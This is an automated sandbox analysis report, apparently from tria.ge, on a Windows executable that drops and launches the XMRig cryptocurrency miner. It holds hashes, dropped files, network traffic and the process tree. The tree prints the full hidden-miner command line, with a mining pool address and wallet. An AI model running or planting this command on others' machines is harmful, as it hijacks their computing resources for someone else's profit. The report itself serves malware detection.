Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    1395s
  • max time network
    1790s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/02/2023, 07:20 UTC

General

  • Target

    521553721.exe

  • Size

    6.2MB

  • MD5

    0252b6575abd58fac21130cd75fc42a0

  • SHA1

    c59c04a7526a74b1dbc006d09af1ae0bf8a646de

  • SHA256

    ea3eedc043d02375db791cd0d508259dede55a7cffa2f75f813d4e239aa5bf70

  • SHA512

    97825284b85755ccf3fe31961e43f246c0b4436989c3c57c2c1cca84e23ea2bfc0c29d4c239363a78252550900e31f04f5052abe34a2c2dd92fca0dd0fcf9988

  • SSDEEP

    196608:L//dQmRrdA6lXCy1ArqkVpKCX+PrF4ZIegh1fJn9eny:D/dQOlXrAZYCuPJOIegjfJnx

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 13 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\521553721.exe
    "C:\Users\Admin\AppData\Local\Temp\521553721.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4972
    • C:\Users\Admin\AppData\Local\Temp\521553721.exe
      "C:\Users\Admin\AppData\Local\Temp\521553721.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:5060
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c xmrig-6.18.1\xmrig.exe -B --coin=XMR -o xmr.2miners.com:2222 -u 48bfyB5bPyDgw8Xv2GqvhKfAFPVa1MKecSnPeCThPv2h8nt7G1gA9NG9TCFe5csLtudTzGHbz65SFQU7qa1ZQcFsUzryHr1.RIG_5255 -p x
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Users\Admin\AppData\Local\Temp\xmrig-6.18.1\xmrig.exe
          xmrig-6.18.1\xmrig.exe -B --coin=XMR -o xmr.2miners.com:2222 -u 48bfyB5bPyDgw8Xv2GqvhKfAFPVa1MKecSnPeCThPv2h8nt7G1gA9NG9TCFe5csLtudTzGHbz65SFQU7qa1ZQcFsUzryHr1.RIG_5255 -p x
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:4632

Network

  • flag-us
    DNS
    github.com
    521553721.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.207.73.82
  • flag-us
    DNS
    objects.githubusercontent.com
    521553721.exe
    Remote address:
    8.8.8.8:53
    Request
    objects.githubusercontent.com
    IN A
    Response
    objects.githubusercontent.com
    IN A
    185.199.108.133
    objects.githubusercontent.com
    IN A
    185.199.109.133
    objects.githubusercontent.com
    IN A
    185.199.110.133
    objects.githubusercontent.com
    IN A
    185.199.111.133
  • flag-us
    DNS
    xmr.2miners.com
    xmrig.exe
    Remote address:
    8.8.8.8:53
    Request
    xmr.2miners.com
    IN A
    Response
    xmr.2miners.com
    IN A
    162.19.139.184
  • 20.207.73.82:443
    github.com
    tls
    521553721.exe
    1.3kB
    6.4kB
    12
    12
  • 185.199.108.133:443
    objects.githubusercontent.com
    tls
    521553721.exe
    59.1kB
    3.4MB
    1256
    2495
  • 162.19.139.184:2222
    xmr.2miners.com
    xmrig.exe
    9.0kB
    9.9kB
    143
    135
  • 104.80.225.205:443
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 204.79.197.200:443
    www.bing.com
    tls, https
    2.8kB
    8.5kB
    19
    19
  • 8.8.8.8:53
    github.com
    dns
    521553721.exe
    56 B
    72 B
    1
    1

    DNS Request

    github.com

    DNS Response

    20.207.73.82

  • 8.8.8.8:53
    objects.githubusercontent.com
    dns
    521553721.exe
    75 B
    139 B
    1
    1

    DNS Request

    objects.githubusercontent.com

    DNS Response

    185.199.108.133
    185.199.109.133
    185.199.110.133
    185.199.111.133

  • 8.8.8.8:53
    xmr.2miners.com
    dns
    xmrig.exe
    61 B
    77 B
    1
    1

    DNS Request

    xmr.2miners.com

    DNS Response

    162.19.139.184

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\VCRUNTIME140.dll

    Filesize

    96KB

    MD5

    f12681a472b9dd04a812e16096514974

    SHA1

    6fd102eb3e0b0e6eef08118d71f28702d1a9067c

    SHA256

    d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

    SHA512

    7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\VCRUNTIME140.dll

    Filesize

    96KB

    MD5

    f12681a472b9dd04a812e16096514974

    SHA1

    6fd102eb3e0b0e6eef08118d71f28702d1a9067c

    SHA256

    d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

    SHA512

    7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_bz2.pyd

    Filesize

    81KB

    MD5

    23dce6cd4be213f8374bf52e67a15c91

    SHA1

    dfc1139d702475904326cb60699fec09de645009

    SHA256

    190ade9f09be287fcc5328a6a497921f164c5c67e6d4fcdcb8b8fd6853b06fe2

    SHA512

    c3983e2af9333a8538f68f7048b83c1bb32219c13adac26fd1036c3dc54394a3e2c1e4c0219232badd8e2c95418019b9b22906bdb23a19601447573a93c038a0

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_bz2.pyd

    Filesize

    81KB

    MD5

    23dce6cd4be213f8374bf52e67a15c91

    SHA1

    dfc1139d702475904326cb60699fec09de645009

    SHA256

    190ade9f09be287fcc5328a6a497921f164c5c67e6d4fcdcb8b8fd6853b06fe2

    SHA512

    c3983e2af9333a8538f68f7048b83c1bb32219c13adac26fd1036c3dc54394a3e2c1e4c0219232badd8e2c95418019b9b22906bdb23a19601447573a93c038a0

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_hashlib.pyd

    Filesize

    60KB

    MD5

    477dd76dbb15bad8d77b978ea336f014

    SHA1

    3ee56105b71c3676c2e4fdaeb7d561f68cf03b9e

    SHA256

    23063b56aa067c3d4a79a873d4db113f6396f3e1fe0af4b12d95d240c4cf9969

    SHA512

    3a97c0a860e3cf97ae53b1f75623c52dcad9b64b70d329511781058a3477bc9faea32c2b8dc4852e7a8c4b0a02c8e3d027cf27e91187069cb35fb4d78d4e73ef

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_hashlib.pyd

    Filesize

    60KB

    MD5

    477dd76dbb15bad8d77b978ea336f014

    SHA1

    3ee56105b71c3676c2e4fdaeb7d561f68cf03b9e

    SHA256

    23063b56aa067c3d4a79a873d4db113f6396f3e1fe0af4b12d95d240c4cf9969

    SHA512

    3a97c0a860e3cf97ae53b1f75623c52dcad9b64b70d329511781058a3477bc9faea32c2b8dc4852e7a8c4b0a02c8e3d027cf27e91187069cb35fb4d78d4e73ef

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_lzma.pyd

    Filesize

    154KB

    MD5

    401eca12e2beb9c2fbf4a0d871c1c500

    SHA1

    7cfc2f94ade6712dd993186041e54917a3dd15ae

    SHA256

    5361824ddac7c84811b80834eca3acb5fe6d63bf506cf92baf5bd6c3786bf209

    SHA512

    da6b63ba4e2e7886701ff2462c11dd989d8a3f2a2a64bb4f5eed7271b017d69e6cfe7347e3d515fdf615ec81d2bb58367bcc1533b8a5073edf9474a3759f6d7c

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_lzma.pyd

    Filesize

    154KB

    MD5

    401eca12e2beb9c2fbf4a0d871c1c500

    SHA1

    7cfc2f94ade6712dd993186041e54917a3dd15ae

    SHA256

    5361824ddac7c84811b80834eca3acb5fe6d63bf506cf92baf5bd6c3786bf209

    SHA512

    da6b63ba4e2e7886701ff2462c11dd989d8a3f2a2a64bb4f5eed7271b017d69e6cfe7347e3d515fdf615ec81d2bb58367bcc1533b8a5073edf9474a3759f6d7c

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_queue.pyd

    Filesize

    29KB

    MD5

    8eabd51d536276f3b3257ee975e50bfc

    SHA1

    1a13f707b29b895647a7de254031a6c80eb2cb7a

    SHA256

    24c23d04d274a4c1234f1a1a35b1805e1f17f99968f8baeec0c3b5295f05608a

    SHA512

    cfa027a1e01204078ccab3c2e1910e5806e0294d3ff0225d4713ea3b16cf07589005a0cc342688c3bb0bb6aa31b5401760c3890d46b39038b046072ad7b02b81

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_queue.pyd

    Filesize

    29KB

    MD5

    8eabd51d536276f3b3257ee975e50bfc

    SHA1

    1a13f707b29b895647a7de254031a6c80eb2cb7a

    SHA256

    24c23d04d274a4c1234f1a1a35b1805e1f17f99968f8baeec0c3b5295f05608a

    SHA512

    cfa027a1e01204078ccab3c2e1910e5806e0294d3ff0225d4713ea3b16cf07589005a0cc342688c3bb0bb6aa31b5401760c3890d46b39038b046072ad7b02b81

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_socket.pyd

    Filesize

    75KB

    MD5

    4ceb5b09b8e7dc208c45c6ac11f13335

    SHA1

    4dde8f5aa30bd86f17a04e09a792a769feb12010

    SHA256

    71f014c3c56661ec93500db1d9f120e11725a8aedabc3a395658275710065178

    SHA512

    858c271b32729762773562ab3dbda8021aa775ba4606f57e891be18d9fe27518a48db0811eff9aafe53fb44557186431c672bbec204fa17a8ae6b86765a02d07

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_socket.pyd

    Filesize

    75KB

    MD5

    4ceb5b09b8e7dc208c45c6ac11f13335

    SHA1

    4dde8f5aa30bd86f17a04e09a792a769feb12010

    SHA256

    71f014c3c56661ec93500db1d9f120e11725a8aedabc3a395658275710065178

    SHA512

    858c271b32729762773562ab3dbda8021aa775ba4606f57e891be18d9fe27518a48db0811eff9aafe53fb44557186431c672bbec204fa17a8ae6b86765a02d07

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_ssl.pyd

    Filesize

    155KB

    MD5

    dcb25c920292192dd89821526c09a806

    SHA1

    79c9af3a11b41d94728f274b45a7c61dc8bbf267

    SHA256

    4e496cb3b89550cf5883d0b52f5f4660524969c7a5fa35a3b233df4f482d0482

    SHA512

    ae4ed1a66eef0b0c474c6ee498cd1388ef41f3746905257c7f5c0f73abbe3262eb47bb5748d47d55f1bd376308335a089c2b4c15ffe5d7fc21f2a660a4a93ba4

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\_ssl.pyd

    Filesize

    155KB

    MD5

    dcb25c920292192dd89821526c09a806

    SHA1

    79c9af3a11b41d94728f274b45a7c61dc8bbf267

    SHA256

    4e496cb3b89550cf5883d0b52f5f4660524969c7a5fa35a3b233df4f482d0482

    SHA512

    ae4ed1a66eef0b0c474c6ee498cd1388ef41f3746905257c7f5c0f73abbe3262eb47bb5748d47d55f1bd376308335a089c2b4c15ffe5d7fc21f2a660a4a93ba4

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\base_library.zip

    Filesize

    1.0MB

    MD5

    5fc720be446fa2effe5a45f7cc90e4e8

    SHA1

    de5488c15c0d2c74a37d1313e4c003e8476acbfb

    SHA256

    d6c62ef7c13ccef351473496cfeba6cfeebef91385f27b35f895169938df682f

    SHA512

    84171a350b677b7e0c50370174f39c104027bc34ca2dcf4687d8a397293c1a0c06429c7423c600a5daabc1515a58d56b71d7528dc5d1864aa90b861dbcfeb2f5

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\certifi\cacert.pem

    Filesize

    278KB

    MD5

    b18e918767d99291f8771414b76a8e65

    SHA1

    ea544791b23e4a8f47ace99b9d08b3609d511293

    SHA256

    a59fde883a0ef9d74ab9dad009689e00173d28595b57416c98b2ee83280c6e4c

    SHA512

    78a4eac65754fb8d37c1da85534d6e1dd0eb2b3535ef59d75c34a91d716afc94258599b1078c03a4b81e142945b13e671ec46b5f2fcb8c8c46150ae7506e0d8d

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\libcrypto-1_1.dll

    Filesize

    3.3MB

    MD5

    6f4b8eb45a965372156086201207c81f

    SHA1

    8278f9539463f0a45009287f0516098cb7a15406

    SHA256

    976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541

    SHA512

    2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\libcrypto-1_1.dll

    Filesize

    3.3MB

    MD5

    6f4b8eb45a965372156086201207c81f

    SHA1

    8278f9539463f0a45009287f0516098cb7a15406

    SHA256

    976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541

    SHA512

    2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\libcrypto-1_1.dll

    Filesize

    3.3MB

    MD5

    6f4b8eb45a965372156086201207c81f

    SHA1

    8278f9539463f0a45009287f0516098cb7a15406

    SHA256

    976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541

    SHA512

    2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\libssl-1_1.dll

    Filesize

    686KB

    MD5

    8769adafca3a6fc6ef26f01fd31afa84

    SHA1

    38baef74bdd2e941ccd321f91bfd49dacc6a3cb6

    SHA256

    2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071

    SHA512

    fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\libssl-1_1.dll

    Filesize

    686KB

    MD5

    8769adafca3a6fc6ef26f01fd31afa84

    SHA1

    38baef74bdd2e941ccd321f91bfd49dacc6a3cb6

    SHA256

    2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071

    SHA512

    fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\python310.dll

    Filesize

    4.3MB

    MD5

    54f8267c6c116d7240f8e8cd3b241cd9

    SHA1

    907b965b6ce502dad59cde70e486eb28c5517b42

    SHA256

    c30589187be320bc8e65177aeb8dc1d39957f7b7dcda4c13524dd7f436fb0948

    SHA512

    f6c865c8276fe1a1a0f3267b89fb6745a3fc82972032280dce8869006feb2b168516e017241a0c82bdae0f321fab388523691769f09a502fc3bd530c1c4cacf1

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\python310.dll

    Filesize

    4.3MB

    MD5

    54f8267c6c116d7240f8e8cd3b241cd9

    SHA1

    907b965b6ce502dad59cde70e486eb28c5517b42

    SHA256

    c30589187be320bc8e65177aeb8dc1d39957f7b7dcda4c13524dd7f436fb0948

    SHA512

    f6c865c8276fe1a1a0f3267b89fb6745a3fc82972032280dce8869006feb2b168516e017241a0c82bdae0f321fab388523691769f09a502fc3bd530c1c4cacf1

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\select.pyd

    Filesize

    28KB

    MD5

    a7863648b3839bfe2d5f7c450b108545

    SHA1

    10078d8edb2c46a2e74ec7680d2db293acc5731c

    SHA256

    8b4b5d37b829ba885281134d9948f249e0ecd553ae72deda6a404619fdf4ccc5

    SHA512

    a709865709abe0c39d68e2ced4aa4387cd173ea9aa0a04c9794733b5bf3584d50256a9f756fee1dec144a9d724b028264763196eeb7b89ab2697ff26d83db843

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\select.pyd

    Filesize

    28KB

    MD5

    a7863648b3839bfe2d5f7c450b108545

    SHA1

    10078d8edb2c46a2e74ec7680d2db293acc5731c

    SHA256

    8b4b5d37b829ba885281134d9948f249e0ecd553ae72deda6a404619fdf4ccc5

    SHA512

    a709865709abe0c39d68e2ced4aa4387cd173ea9aa0a04c9794733b5bf3584d50256a9f756fee1dec144a9d724b028264763196eeb7b89ab2697ff26d83db843

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\unicodedata.pyd

    Filesize

    1.1MB

    MD5

    cf1eda3f804dfa64ac00cad29ab243e1

    SHA1

    3b0f08fa679227fa635490725e17460a9de8092d

    SHA256

    a3aa957cf891a411a4e22e41aa4053265eccba4d47b5abe6475789ebba7fcca0

    SHA512

    1ba213a7e5916fe628d80efdeade35de7db88cc8118f8ac348dc7f7a7c5977975c9cf63d774136259fc055790eb96644bde2ee19c044126f1d59d665e4bc8d97

  • C:\Users\Admin\AppData\Local\Temp\_MEI49722\unicodedata.pyd

    Filesize

    1.1MB

    MD5

    cf1eda3f804dfa64ac00cad29ab243e1

    SHA1

    3b0f08fa679227fa635490725e17460a9de8092d

    SHA256

    a3aa957cf891a411a4e22e41aa4053265eccba4d47b5abe6475789ebba7fcca0

    SHA512

    1ba213a7e5916fe628d80efdeade35de7db88cc8118f8ac348dc7f7a7c5977975c9cf63d774136259fc055790eb96644bde2ee19c044126f1d59d665e4bc8d97

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.18.1\xmrig.exe

    Filesize

    7.8MB

    MD5

    6f4532e49d65c2be0355b222f96e06e8

    SHA1

    268e90ce25e01bbb205f6ae3f493f8da36a61480

    SHA256

    acaf8e844ef7f4f65033ebe9546c394cc21bce175dac8b59199106309f04e5ab

    SHA512

    85f495b0bbd0673df376f44e912f9a0a8d201c2843f1a9efa64d93703a2d8ba2b6fa2638a747e79604715d26ddfc07de26ba43d03adf86290d928b442bf09207

  • memory/4632-163-0x000002C64AD10000-0x000002C64AD30000-memory.dmp

    Filesize

    128KB

  • memory/4632-164-0x000002C64AE60000-0x000002C64AE80000-memory.dmp

    Filesize

    128KB

  • memory/4632-165-0x000002C64AE80000-0x000002C64AEA0000-memory.dmp

    Filesize

    128KB

  • memory/4632-166-0x000002C64AEA0000-0x000002C64AEC0000-memory.dmp

    Filesize

    128KB

  • memory/4632-167-0x000002C64AE80000-0x000002C64AEA0000-memory.dmp

    Filesize

    128KB

  • memory/4632-168-0x000002C64AEA0000-0x000002C64AEC0000-memory.dmp

    Filesize

    128KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.